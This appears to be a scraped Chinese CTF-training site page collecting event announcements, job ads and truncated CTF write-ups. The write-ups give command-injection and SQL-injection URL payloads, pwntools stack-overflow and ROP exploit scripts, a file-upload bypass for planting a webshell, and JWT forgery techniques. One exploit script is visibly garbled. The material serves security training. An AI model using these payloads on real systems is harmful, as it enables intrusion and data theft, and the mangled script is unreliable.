最新 CTF比赛解题攻略训练学习新闻活动
陕西省信息安全技术沙龙 “御风而行-协同联动” 合作伙伴宣传文案 御风而行系列沙龙活动作为西安首个面向高校信息安全社团进行技术交流的活动,已成功举办一届,由各高校社团申请主办,芝诺信安等多个安全组织为技术支撑单位。沙龙凝聚优秀的网络安全企业,高校安全社团,汇聚网络安全专家学者、网络安全从业者、网络安全爱好者共同聚焦“网络安全”。 本次沙龙共一天(12月8日),多个企业安全负责人、研究员及高校网络安全社团将围绕安全技术,安全建设进行议题分享与研讨。2018年12月5日,将联合胡门网络开放本次沙龙活动CTF平台,线上举行御风系列CTF活动,并在沙龙活动当天进行CTF夺旗赛颁奖仪式。 “XXXX”作为本次沙龙活动的技术合作支撑单位,负责沙龙活动技术服务支持和XXXX,助力本次沙龙活动。 相关议题分享介绍: 主题:virtualbox沙盒逃逸 分享人:子青 西安石油大学 议题简介:使用虚拟机是安全人士时常为了在一台操作机上完成多种环境搭建的手段,丰富自身电脑的环境,而且处在虚拟机总是被当作临时环境使用,很多安全问题都会被自动忽略。这样的环境很危险,不过更多人心里抱有侥幸,想着用完就推掉。就在最近的VirtualBox爆出了新0Day,VirtualBox 5.2.20及以前版本的默认设置里存在危险的设置,允许具root / administrator权限的虚拟机逃逸出来,并提权为ring 0。本分享议题以该漏洞的原理分析为中心,延伸出该如何让自己的虚拟环境更加安全。 主题:软件定义安全-SDN中的安全威胁 分享人:颜某 西京学院 议题简介:随着计算机网络的高速发展,以TCP\IP协议为核心的互联网早已渗透到我们生活中的各个方面。随着网络用户数量的急剧增加,网络规模不断扩大,网络设备上承载了过多的协议,我国面临的最迫切问题就是如何解决下一代互联网的问题,通过研究发现,SDN能实质性地提高网络性能,它在中国有着极大的市场潜力。而SDN中的安全隐患现在看来是刻不容缓。 主题:物联网安全的攻守之道 分享人:王骕 湖南御风维安网络科技 议题简介:万物互联时代,物联网设备的安全问题成为了研究者密切关注的方向,如GSMA IoT、OWASP、AllJoyn等框架逐渐被安全研究者发现和重视。本次议题将从边缘计算、态势感知、机器学习等角度分享物联网安全的防护技术,从固件提取与审计、协议分析、物联网生态三端等角度分享物联网设备漏洞挖掘的经验和技巧,为大家呈现物联网安全的攻守之道。 主题:CSRF+XSS+越权组合拳 分享人:雅轩 某乙方公司安全研究员 议题简介:CSRF+XSS+越权组合拳,由浅入深的阐述乙方公司安全研究员在工作中遇到的奇葩漏洞以及漏洞防范技巧。并就自己本身求职的一些职业规划做出讲解。 主题:低成本HID攻击的简单实现 分享人:王云泽 西北工业大学 议题简介:HID攻击是近几年出现的一种较为冷门的攻击形式,通过利用广泛使用的各类HID协议所存在的漏洞,伪装或劫持HID设备进行攻击。这一攻击形式有独特的优缺点,它难以防护,难以识别,但是有距离限制,环境限制等等。本分享议题主要讨论HID攻击中的BadUSB攻击方式,以降低成本和提高普适性为中心,希望通过这一攻击技术的安全发展,找到更多现行技术的不足,推动对应防护技术的发展。 主题:从“1+1”到“2+2” 分享人:四叶草安全攻防演练工程师、西安电子科技大学计算机技术专业学位硕士研究生兼职指导老师 coffee 议题简介:D盾经常用于webshell的查杀,并且相当大一部分都可以被杀掉,利用图片和相关特殊手法绕过D盾等webshell查杀工具成为网络安全攻防对抗中一个不过时的话题,其中无字母数字的webshell,成为一大杀器,AWD比赛内存中的不死马也成为我们目前头疼的问题。 关于我们: XXXXXXXXXXXXXXXXXXXXXXXXXXXX公司是一个专注于xxxxxxxxxxxxxxxxxxx的互联网安全公司 沙龙合作伙伴: 报名二维码: 相关活动链接: http://www.huodongxing.com/event/7466961161000 相关报道: https://www.anquanke.com/post/id/166500 往期精彩活动剪影:
KCon 2018黑客大会在经过首日高质量的闭门培训,以及两天干货议题分享之后,于8月26日晚圆满落下帷幕。 KCon 2018大会现场 KCon 的口号是汇聚黑客的智慧,在KCon 2018,我们再次见证了全球黑客的热情,大家齐聚一堂,用攻破之精神、探索之成果向安全行业及整个互联网传递着正义黑客应该具有的价值观和人生观。 知道创宇CEO 赵伟开幕致辞 在KCon 2018开幕式上,知道创宇CEO赵伟说道,KCon定位于干货和品位,聚焦于有价值的技术内容以及真正的黑客精神,这个平台聚集着黑客们的智慧结晶,这样有意义的交流也让安全行业发展更具生机。KCon走到第七年,除了顶尖前沿的技术分享,各互联网公司的SRC平台、白帽子们、安全自动化工具开发者等等群体都加入进来,散发着无穷的能量。赵伟表示,“当大家不认为我们办了一场商业会议,而是一场有品位的黑客会议时,我们就成功了。” 会前闭门培训再度升级 KCon认为,能力越大者,责任也就越多,安全行业从来就不是一个轻松的行当,只有当一个人有了敬畏和规则,有了技能与实力,才能在这条路上走的更远。KCon从2015年和2016年相继引入安全入门培训和安全进阶培训,旨在为不同层次的安全技术人员带来心灵上的洗礼或是技能点的专攻提升。 KCon 2018安全入门引导培训现场 在KCon 2018上,两场闭门培训皆采取了更加细化的方式,分为上下午两场,为参会者带来更好的培训体验。安全入门培训邀请到知道创宇K学院资深培训讲师周家豪,带来黑客技术及案例分享,为年轻学子打开黑客世界的大门。另一位培训导师是来自听潮盛世(北京)科技有限公司创始人杨凡,他通过渗透测试技术讲解,带领大家感受渗透实战的魅力,受到与会者一致好评。 KCon 2018安全进阶培训现场 在安全进阶培训方面,讲师hyperchem通过实战方式引导学员对现行主流游戏平台的破解方式进行深度剖析,引得众多游戏机爱好者和硬件发烧友大呼过瘾。而去年深受好评的进阶培训讲师xwings也再次到来,带来《物联网系统安全实战—PartII》培训,更深入地开展物联网通用设备全过程分析,并将拆解设备送给现场学员供研究。 18大议题分享干货依旧 不负众望 KCon 2018演讲日现场 KCon 黑客大会重磅环节,自然是为期两天的18个干货议题分享。本届KCon 主题是「聚·变」,当KCon经历七年轮回后,再次回到“黑客精神”的原点,聚焦当下最新、最热门的攻防研究方向与技术,涵盖汽车安全、智能家居安全、工业网络安全、智能合约安全、数字钱包安全等领域,用技术实力引领业界未来的变革。 KCon 2018演讲日现场 KCon提倡以极客精神探索攻防技术、实践安全之道,谢绝商业演讲,致力打造纯技术分享会议。正是长期以来的严格要求和精益求精,才让KCon成长为中国网络安全圈最年轻、最具活力与影响力的前沿网络安全攻防技术交流平台。 不断创新 丰富KCon参会体验 KCon 2018 SRC英雄榜 除了保持高水准的议题分享,KCon连年都在推陈出新,KCon 2018保留了往届推出的经典环节,如兵器谱展示、周边售卖、合作伙伴展示等,今年还新设置了“SRC英雄榜”,向众多致力于维护互联网健康环境的漏洞收集及应急响应平台,以及背后默默付出的白帽子致以敬意。腾讯、京东、美团、小米、唯品会、陌陌等国内一流互联网公司的安全平台均有上榜,主办方也希望借由KCon 的平台加强业内各界的安全沟通及合作,共同打造互联网的安全生态。 KCon 2018 兵器谱 KCon 2018赞助商及合作伙伴展区 同时,让历届参会者印象深刻的摇滚表演也全新升级为Rocking Live Show,贯穿于两天演讲日的每一场茶歇时刻,让黑客与摇滚更紧密地结合在一起。一名真正的黑客,正如摇滚乐所要表达的那样,向往自由,善于创新,充满正能量。KCon 2018 Rocking Live Show由陌陌SRC独家冠名赞助,在走唱团队激情表演下,点燃了大家的内心激情。 KCon 2018 Rocking Live Show 致谢合作伙伴与朋友们 从2012年到2018年,KCon从一个小小的安全论坛成长为中国网络安全圈最年轻、最具活力与影响力的前沿网络安全攻防技术交流平台。每一年KCon 黑客大会的成功举办,都离不开给予我们帮助和支持的行业伙伴们。 KCon 2018场外展区 KCon 2018黑客大会得以圆满举办,在此感谢黑钻赞助腾讯安全,金牌赞助腾讯安全应急响应中心、安赛AISEC、椒图科技,Rocking Live Show独家赞助陌陌安全应急响应中心,礼品赞助唯品会安全应急响应中心,独家中英同传支持搜狗同传,安全客、IT168、链闻三家战略媒体及十余家合作媒体的鼎力支持。 KCon 2018会务组 KCon 所做的努力是在建立一个安全氛围,团结所有正义的黑客,共同创造和维护更安全的网络空间,正是有了你们的帮助和支持,我们所共同向往的那个世界才会在不远的前方。 KCon 2018黑客大会圆满落幕,难舍再见,但这也更让我们期待来年,正义的黑客们,我们KCon 2019再约! 一直以来,KCon 都以高质量技术分享闻名,应各位参会者的要求,并通过与演讲者的沟通取得同意后,Kcon公布了18大议题中的14个议题PPT! PPT下载地址: Github:https://github.com/knownsec/KCon   现场照片下载: 百度云:https://pan.baidu.com/s/1N0nmd9_woSGfVcEi6oVARg 密码:5ha7
独孤孤独嘟咕噜嘟噜队 writeup 西安工业大学 网络空间安全协会  SSSP4RTA calc .git泄露出index.php的源码,然后发现shell_exec()的命令执行绕过 <?php echo $str." = ".shell_exec("echo \"$str\" | bc"); ?> payload http://202.120.7.205:60003/index.php?calc=666%22;cat%20there_1s_4_fl4g;%22;# flag:ISG{522b28987a79534f8a38b25ebcc474fb} secret burpsuite把302跳转拦下来,flag base64加密后就放在index.html里 flag:ISG{H3IIO_1sG_js_Tr4p} new news-[number]处存在注入,过滤了空格用/**/替换,select过滤用大小写可绕过 payload http://202.120.7.206:60009/news-19/**/unIon/**/selEct/**/flag,2/**/from/**/flag--+.html flag:ISG{7a78683a929dbc6bd8e5e96f0c185b16} junkcode 在ida里可以看到程序对代码进行了xor操作,还原之后 可以看到ptr1和输入进行异或,结果和ptr2比较,因为异或是可逆的 所以写脚本得到flag Flag:ISG{jUnK_c0de_n0t_jUnK} stackoverflow 在overflow me处触发一下canary.. 进到handler函数里面. 然后在确认y/n的地方将v1覆盖成/bin/sh,使程序直接执行execve("/bin/sh",,) #!/usr/bin/env python from pwn import * context.log_level = 'debug' p = remote('202.120.7.206', 60010) #p = process('./stackoverflow') p.recvuntil('Input your name: ') p.sendline('AAAA') p.recvuntil('Overflow me\n') p.sendline('A'*50) p.recvuntil('try again?[Y]/[N] ') p.sendline("y" * 8 + "/bin/sh\x00") p.interactive() Babynote Delete函数,free后没有置空,导致uaf或doublefree 漏洞 Add函数允许申请任意大小chunk 总体思路就是fastbin attack,通过错位修改fastbin的fd指针指向malloc_hook附近,在分配两次chunk便可以修改malloc hook的值,通过将malloc修改为onegadget,,然后利用用malloc_printerr来触发malloc #!/usr/bin/env python from pwn import * context.log_level = 'debug' p = process("./babynote") #p = remote('202.120.7.206', 60002) elf = ELF('./babynote') def add(size,content): p.recvuntil('>')…
让互联网变得更加美好 CloverSec Security Conference(简称:SSC),致力于打造为国内顶尖的网络安全峰会,旨在推动国家网络安全事业整体发展。2018第三届SSC安全峰会以“智御安全•洞鉴未来”为主题,将于9月18日在中国•西安(君悦酒店)召开, CTF Dog 受邀出席参加,共同助力网络强国建设。 SSC安全峰会作为中西部最具盛名,影响力最大,知名度最高的网络安全安全峰会,已连续举办两届,由西安四叶草信息技术有限公司(简称:四叶草安全)主办,峰会凝聚全国优秀的网络安全企业,汇聚全国网络安全专家学者、行业大咖、网络安全从业者、网络安全爱好者共同聚焦“网络安全”。 本次峰会共两天(9月18日-19日),第一天为高峰论坛,分为主论坛和分论坛,主论坛以“引领安全新方向,探究安全新理念,共创安全新未来”为主题,分论坛以“分享技术干货,交流前沿技术,共享研究成果”为主要内容;第二天为闭门会议。 CTF Dog - CTF比赛训练学习网站 四叶草安全作为国内安全行业发展最快的创新型企业之一,专注于为客户提供网络信息化安全服务,致力于帮助用户先于黑客发现并及时解决安全问题,与四叶草安全的良好合作将有效推进我国网络安全整体建设,助力网络安全强国建设,最后,预祝2018第三届SSC安全峰会圆满成功! SSC活动官网   活动:抽奖送SSC门票 * 10张   请中奖且未加群用户尽快添加管理员微信253358971获取门票兑换码。  
联系方式: 邮箱:[email protected] 电话;18161902352 待遇:15k-20k 岗位职责简述:(工作地点 西安 ) 负责对操作系统、WEB应用、APP进行安全风险评估和渗透测试工作; 参与安全事件应急响应,对攻击进行溯源并给出解决方案; 监管单位工作支持,配合完成各种安全检查; 专业素质要求: 参与过运营商项目信息安全评测、风险评估工作经验者着重考虑; 对业务、逻辑漏洞挖掘有深入理解和认识; 对Web 安全有深刻理解,具备代码审计和独立漏洞挖掘能力; 掌握一门编程语言,可编写POC或EXP; 熟悉渗透测试的步骤、方法、流程,具有Web安全实战经验; 熟悉主流的移动APP安全与漏洞、检测方法与攻防技巧;
作者:niexinming 动态代码审计的用处 大型项目代码结构复杂 有些危险的功能隐藏较深(危险的定时计划任务、sqlite数据库任意创建导致任意文件覆盖……) 提高效率,希望通过一些黑盒的方法比较快速的找到漏洞。 常见漏洞分类 数据库操作 敏感函数的调用和传参 文件读写操作 网络访问操作 正文目录 数据库general log 日志 hook关键函数 结合auditd http盲攻击 fuzzing 数据库日志 general-log是记录所有的操作日志,不过他会耗费数据库5%-10%的性能,所以一般没什么特别需要,大多数情况是不开的,例如一些sql审计和代码审计等,那就是打开来使用了 Mysql通过命令行的方式打开general log: set global general_log_file=''; set global general_log=on; Postgresql 通过编辑配置文件打开general log: 编辑:postgresql.conf log_directory = 'pg_log' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' log_statement = 'all' 打开之后用burp向web api发送一些包含sql注入的畸形数据 利用Linux的grep指令过滤出sql执行中的ERROR关键字,就可以很快的找到sql注入漏洞 Hook关键函数 根据基于python的自动化代码审计和pyekaboo这两个文章的启发而来 Python对象可以被轻易的改变,通过设置PYTHONPATH这个环境变量,使python在加载string这个模块的时候优先加载我自定义的string模块,下图演示的是劫持string模块的upper函数 之后我的思路是,通过劫持python的函数,把输入到危险函数的参数输出到日志中,最后调用正常的python函数 这样就可以劫持我们认为敏感的函数 劫持模块的demo: import imp import sys class _InstallFcnHook(object): def __init__(self,fcn): self._fcn=fcn def _pre_hook(self,*args,**kwargs): print "hook:"+str(args) return (args,kwargs) def __call__(self,*args,**kwargs): (_hook_args,_hook_kwargs)=self._pre_hook(*args,**kwargs) retval=self._fcn(*_hook_args,**_hook_kwargs) return retval fd,pathname,desc=imp.find_module(__name__,sys.path[::-1]) mod =imp.load_module(__name__,fd,pathname,desc) system=_InstallFcnHook(system) 劫持效果: 这就意味着我们可以劫持危险的函数,把参数输出到日志里面,通过日志信息,可以判断这些参数是否可以被输入控制。通过这种方式可以方便找到ssti、pickle反序列化漏洞和命令执行漏洞等其他的漏洞 而且这些可以很方面的拓展到其他的模块中 cd hook/ ##进入到hook模块所在目录 cp os.py xxx.py ##把os模块复制一份,xxx模块是你想hook的模块 编辑xxx.py :注释掉原来被hook的函数,添加想要hook的函数,下面的示例是hook了subprocess模块中check_call函数 Ps:需要填一些坑: 修改启动代码从shell中启动python web 因为有一些python web是从wsgi中启动的,这些只要简单修改启动代码就可以从WSGI方式启动切换到shell启动 从内存中删掉已加载的模块 一些模块通过import动态导入,需要在动态导入后通过del modules删掉被装载的模块 关闭调试选项 例如在flask启动时将debug选项设置为false,否则会产生两个python进程 其他问题 Python web性能下降、代码不兼容、有些模块无法被hook,其中python的内置函数open就无法通过这样的方式被hook。…
关于XFSEC 数字资产安全守护者专注于数字资产安全,以人工智能、大数据分析双维度能力驱动自身安全能力不断迭代,结合用户自身业务。协助其对数据资产、网络空间资产进行精细化管理,提升数字资产良性应用效率的同时保障用户数字资产安全,核心能力应用于互联网、政府、能源、金融和贸易等多个领域。 西安市高新区科技二路68号 西安软件园秦风阁A106 029-88322887 [email protected] 招聘信息 销售总监 岗位职责:1、负责管理政府、运营商、银行、证券、军工、医疗、智慧城市、公共安全等方向的销售团队,带领团队完成行业销售 业绩; 2、负责大区、省、市(地级市)三级区域内销售活动的策划和执行,制定销售计划,达成销售指标; 3、开发国内各行业新客户,维护老客户,签订销售合同,完成与技术团队的对接协调; 4、定期整理、归纳并更新所负责行业和客户的市场信息、访问报告; 5、有大数据分析服务、大数据分析产品相关销售经验优先。 岗位要求:1、本科及以上学历, 两年以上安全行业工作经验; 2、具有网络安全产品与服务、国内外网络安全市场相关知识,对相关行业(政府、运营商、银行、证券、军工、 医疗、智慧城市、公共安全)及其信息化状况有一定的了解; 3、有网络安全服务、网络安全产品、CDN、IDC相关销售经验优先; 4、具备较强的沟通协调能力,具备相关行业销售团队管理经验; 5、自我驱动力强,有较强上进心。 数据分析研究员 岗位职责:1、从事海量大数据分析与平台辅助优化工作,包括实时流量分析、日志分析,深度分析,智能提取等; 2、负责基于客户具体业务流程的海量日志流量数据分析,根据不同企业业务构建相应数据模型、对具体业务场景,协助使用者对生产和业务进行优化,提升客户业务效率以及降低成本; 3、通过对军工、能源,政府、银行、智慧城市等现有数据的不断分析,不停创建新的业务模型,优化分析方案,提供最有价值的数据信息,支持用户决策优化。并提供可落地的数据解决方案。 岗位要求:1、本科以上学历, 两年以上数据分析相关研究经验; 2、精通Java、python、php、go 等任意一门语言; 3、掌握数据污染防护技能; 4、擅长使用开源框架,如:elk、kafka、storm、spark等大数据处理框架,掌握实现原理; 5、擅长使用机器学习框架TensorFlow,掌握其原理, 熟悉常见的机器学习算法:神经网络,SVM等; 5、擅长使用机器学习框架TensorFlow,掌握其原理, 熟悉常见的机器学习算法:神经网络,SVM等; 6、熟悉回归分析模型、关联规则挖掘、分类和聚类算法、协同过滤算法等数据统计模型和挖掘算法; 7、通过数据分析和挖掘数据,探索业务机会点,利用算法解决实际业务问题。 附加项:1、拥有分布式图计算,实时流计算,大数据处理经验者优先,有深度学习研究经验者优先; 2、有从事能源、金融领域数据分析及数据安全业务经历者优先; 人工智能研究员 岗位职责:1、实时跟踪学习人工智能与大数据行业相关前沿的最新技术; 2、研究目前流行人工智能算法,知识图谱分析,智能图谱构建等问题,根据客户业务提出产品模块改进方案,不断优化公司人工智能相关产品; 3、辅助设计公司大数据与人工智能方面相关产品,分析研究优化智能算法,提高人工智能计算智能,感知智能等能力; 4、配合数据分析研究员工作,通过机器学习、深度学习,人工智能等技术构建智能业务模型算法,提升产品精准业务分析与感知智能能力。 岗位要求:1、本科或以上学历,两年以上机器学习,人工智能相关研究经验; 2、掌握机器学习,深度学习,人工智能等相关知识,有该领域算法的研究或开发经验; 3、熟悉深度神经网络的常用模型(CNN、RBN、RCNN、DNN等),能够熟练使用Caffe、Theano、Torch、Tensorflow等任一种主流的深度学习框架; 4、熟练掌握常用的统计机器学习算法(神经网络、逻辑回归、决策树、SVM、Boosting等); 5、进行基于知识图谱的认知智能化研究与落地实践关键技术研究; 6、具有很强的研究能力与学习意愿,较强的团队协作能力与沟通能力,能够阅读相关领域英文论文; 7、责任心强,具备良好的团队合作精神和承受压力的能力。 安全研究员 岗位职责:1、国内外安全技术的跟进和重现,包括:操作系统安全漏洞、WEB 应用安全漏洞、移动安全类漏洞; 2、安全漏洞的挖掘、分析、检测、防御技术研究及工具开发; 3、持续跟进研究新的攻击技术和防御方法; 4、熟悉常见漏洞挖掘方法,熟悉动态调试分析、补丁比对分析,熟悉模糊测试技术; 5、熟练掌握至少一门编程语言,Lua、Python、PHP、Java等。 岗位要求:1、本科或以上学历,两年以上安全漏洞相关研究经验; 2、熟悉常见漏洞挖掘方法,熟悉动态调试分析、补丁比对分析,熟悉模糊测试技术; 3、熟练掌握至少一门编程语言,lua、python、php、java等; 4、对各类领域的新技术感兴趣,善用搜索引擎,有良好英文文档阅读习惯者优先; 5、熟悉操作系统原理,熟悉反汇编,逆向分析能力较强; 6、漏洞相关的系统底层机制研究、漏洞利用攻防研究,包括应用层和内核; 7、熟悉各种攻防技术以及安全漏洞原理,具备独立分析或挖掘漏洞的经验; 8、具有良好的沟通能力、协调能力、理解能力,并拥有强烈的责任心和团队管理能力,能承受一定强度的工作压力者优先; 9、有过实际漏洞挖掘案例,或者开发过漏洞挖掘系统者优先; 10、有在国内外发布过重大影响漏洞的优先。 安全工程师 岗位职责:1、负责公司和客户业务的安全测试、应急响应; 2、撰写安全渗透测试技术类报告和产品相关文档; 3、为公司产品和客户提供测试服务技术支持; 4、国内外安全技术的跟进和重现,方向包括但不限于:二进制安全、WEB安全。熟悉OWASP Top 10各类安全漏洞的原理、测试、修复方法; 5、对安全技术有浓厚兴趣,关注最新安全技术。 岗位要求:1、熟悉各类安全漏洞的原理、测试、修复方法; 2、有编程思维,能熟练使用C/C++、python、java或其他脚本编程语言至少一种,有过独立的开发经验者优先; 3、对安全技术有浓厚兴趣,关注最新安全技术; 4、参与过国内CTF相关赛事; 5、具有良好的沟通能力、协调能力,并有强烈的责任心,能承受一定强度的工作压力。 项目经理 岗位职责:1、负责项目计划的制定、跟踪和维护,管控项目生命周期。 合理制定项目目标和计划,明确划分工作内容,并可根据各种变化及时调整项目计划; 2、负责协调项目之间合理资源分配,保证资源使用最优; 3、全面管理技术项目的实施,保证项目的进度和质量控制,并确保项目目标的按期实; 4、负责项目风险控制、及时发现跟踪解决影响项目进度相关问题,积极推动与解; 5、编制项目实施、招投标、验收等的相关文档。 岗位要求:1、能熟练使用项目管理相关软件; 2、5年以上项目管理经验; 3、能独立承担项目计划、项目实施过程管控; 4、具有较强的表达和沟通能力,思维敏捷、责任心强、勇于接受挑战;能适应短时间的高强度工作; 5、有良好的技术文件编制能力,能独立撰写项目技术、设计及实施方案; 6、正直诚实、勤奋上进、积极学习、有团队协调能力,目的明确,能与公司共同成长和发展。 软件研发工程师 岗位职责:1、针对实际业务需求,提供合理的架构设计,并实现其核心逻辑; 2、负责研发公司安全产品的后台模块; 3、协同其他研发工程师,进行软件模块的集成; 4、协同UI/UX设计师和前端研发工程师,进行产品界面联调; 5、配合产品经理,研发出满足产品需求规格的软件;…
PlainR2B 因为是比赛结束之后写的 wp 很多不全的。 希望不要介意。这个 pwn 是一个很常规的常规的栈溢出 构造 rop 代码如下 #!/usr/bin/env python # -- coding: utf-8 -- from pwn import * #p = process("./pwn1") p = remote("117.50.60.184",12345) libc = ELF('./libc-2.23.so') elf = ELF("./pwn1") def exp(): ecvuntil('your name?\n') p.sendline('test') p.recvuntil('get flag?\n') #gdb.attach(p) payload1 = 'A'0x1c+'B'4+p32(elf.sym['write'])+p32(elf.sym['game'])+p32(1)+p32(elf.sym['got. libc_start_ main']) endline(payload1) addr = u32(p.recv(4)) #p.interactive() libc.address = addr - libc.sym[' libc_start_main'] print "libc:%s" % hex(libc.address) p.recvuntil('your name?\n') p.sendline('/bin/sh') p.recvuntil('get flag?\n') payload2 = 'a'0x1c+'b'4+p32(libc.sym['system'])+p32(elf.sym['game'])+p32(elf.sym['name']) p.sendline(payload2) p.interactive() if name == ' main ': exp() Antidbg 解密脚本: # index1_array = [2,2,2,2,3,1,1,2,1,1,2,1,1,0,1,1,2,2,0,1,1,1,1,0,1,1,2,2,0,1,1,2,2,1,1,1,1,1,2,1,1,3] key1 = [2,3,6,7] index2_array = [0x6,0xC,0x1,0x7,0xB,0,0x6,0x2,0x1,0x6,0x1,0x7,0x2,0xD,0x5,0x1,0x3,0x3,0xD,0x4,0x3,0x1,0x0,0x D,0x8,0x8,0x1,0x2,0xD,0x7,0x0,0x1,0x2,0x6,0x8,0x2,0x9,0x0,0x5,0x2,0x2] key2 = [0x0,0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8,0x9,0xa,0xb,0xc,0xd,0xe,0xf] flag = [] for idx in…
签到 套娃 按个分析检测一下图片发现第6张图片有问题 虚幻 下载到1.png附件,放到kali里,通过binwalk命令发现包含9个png文件。 通过foremost命令将文件分离。通过photoshop将9个图片按照9宫格拼接成一张图。 根据提示为汉信码,将4角补全。 PS通过色调分离、黑白、反向操作,生成汉信码 通过手机APP扫描,得到flag wafupload if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/png', 'image/gif'])) { 首先监测Mime,这个可以伪造。 $ext = end($file); echo $ext; if (!in_array($ext, ['jpg', 'png', 'gif'])) { 然后检测后缀,用的end,所以考虑传入的filename为数组。 $filename = reset($file) . '.' . $file[count($file) - 1]; 这里用的是统计参数数量-1来获取后缀,拼接写入,所以比如数组三个元素,-1就是2,让下标为2的值为php即可写入php文件。 上传webshell后,cat /flag即可。 [/usr/bin/]$ cat /flag flag{59fb9120-bacb-47bd-ac71-28ee07a355e5} 二叉树 README中的内容为BASE64编码,解码后内容为: 1.这是一棵红黑树 2.树从1-59上的果子依次为 ek`~3c:gf017b744/b38fd~abm7g5489e2{lf6z8d16hae`98}b|-21m.e: 3.依次从树上取走第 18,35,53,50,14,28,19,6,54,36 个果子,过程中保持红黑树性质不变 4.tmpflag为第 8,56,47,37,52,34,17,8,8,29,7,47,40,57,46,24,34,34,57,29,22,5,16,57,24,29,8,12,57,12,12,21,33,34,55,51,22,45,34,31,1,23 个果子 5.flag为 tmpflag 红色果子 ASCII +1 , 黑色果子 ASCII-1 6.让我们愉快的开始获取flag吧 按照1-59的顺序将ek`~3c:gf017b744/b38fd~abm7g5489e2{lf6z8d16hae`98}b|-21m.e:按照球上的顺序贴上,然后取出18,35,53,50,14,28,19,6,54,36,最后算出falg为flag{10ff49a7-db11-4e43-b4f6-66ef12ceb19d}。 Bill 先使用凯撒解密 然后 比尔密码 进行取首字母 脚本 key="ijwwvwuirgpkifkcfkepdkjttnwpoalkpohaptthmarqllglgrpqfvhnfcnlmdpavpemirbwncrtmdaluaucukieqfobuvqwewbbgubplfhddbotkcrvwetujdnvgobdjcmmhiaaciqicsfsnorcjogdkkgueoemjgotsgsjrsetsvqnvhnhenoihjrjfwqbsjsqspgluqvubkatdamqhflsfvnewicbmdmhrl" plain_text='22563e24a26721cf212895dac4182a9d8d57c22b54853e674279d12d077d3e6a1c62b71d022102' for num in range(0,39): hex_num=plain_text[2*num]+plain_text[2*num+1] int_num=int(hex_num,16) print(key[int_num]), Martricks 通过angr爆破的方式得到flag信息 Unfinished 用户名处存在insert 注入 比如 用户名 填写 1' and(ascii(substring(database()from 1 for 1))>100)+' 登录进取 用户名会变成1 发现过滤了 information 和 逗号等关键字…
比赛时遇到形如A.B.C形式的字符串,就应该想到JWT。 比如:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QifQ.ZgXr0npDUDvB9Pg1Q9T8leLYj2qbEFFR1kwfjGXHQPE 1、JWT定义 JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。 适用场景 1、用于向Web应用传递一些非敏感信息。例如完成加好友、下订单的操作等等。 2、用于设计用户认证和授权系统。 3、实现Web应用的单点登录。 JWT的组成 一个JWT实际上就是一个字符串,它由三部分组成:头部、载荷与签名。 jwt 中常用的签名算法是 HS256, 2、小工具-JWT.IO jwt.io JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.JWT.IO allows you to decode, verify and generate JWT. 3、攻击方法 修改签名 1、修改签名算法为None 2、修改RS256 为 HS256,即非对称密码改为对称密码。 破解secret key 1、传入相关错误代码,使程序报错。 2、HS256暴力破解,下边是两个小工具。 https://github.com/brendan-rius/c-jwt-cracker https://github.com/jmaxxz/jwtbrute 4、题目案例 网鼎杯 i_am_admin 题目:你能登录进去吗? 抓取登录数据包,发现 JWT : 登录进去可以发现用于加密的 secret key : 使用这个 secret key 到 https://jwt.io/ 生成 admin 对应的 token 值: 使用该 token 值访问网站即可获得flag: 网鼎杯 mmmmy 题目:find the flag. 抓包发现又是python的web程序,使用了JWT:(随手用test/test登录即可看到) 使用 c-jwt-cracker 爆破 secret key : 发现只有 admin 才能用留言板功能,所以 伪造admin的token 登录: 转自 https://xz.aliyun.com/t/2648 5、推荐参考文章: https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/ https://jwt.io/introduction/…